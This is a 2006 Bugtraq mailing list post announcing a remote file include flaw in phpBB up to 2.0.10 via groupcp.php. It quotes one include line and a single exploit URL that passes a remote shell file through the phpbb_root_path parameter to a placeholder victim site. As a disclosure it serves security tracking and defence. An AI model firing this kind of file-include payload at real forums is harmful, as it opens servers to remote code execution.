Bugtraq mailing list archives

PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability

From: "mahmood ali" <mah_k_2000 () hotmail com>
Date: Wed, 18 Oct 2006 12:00:31 +0000

###########################################
PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability
###########################################

Source Code:
http://www.comscripts.com/jump.php?action=script&id=666
###########################################

Vulnerable Code:_
include($phpbb_root_path . 'includes/page_header.'.$phpEx);

;
###########################################

Exploit :
http://www.vicTim.com/[PhpBB]/groupcp.php?phpbb_root_path=shell.txt?
###########################################

Discoverd By :  Mahmood_ali
Conatact :      mah_k_2000 () hotmail com
###########################################

Special Greetings :_  Tryag-Team
###########################################

_________________________________________________________________

Windows Live Messenger has arrived. Click here to download it for free!http://imagine-msn.com/messenger/launch80/?locale=en-gb

Current thread:

PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability mahmood ali (Oct 18)
- <Possible follow-ups>
- Re: PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability neothermic (Oct 19)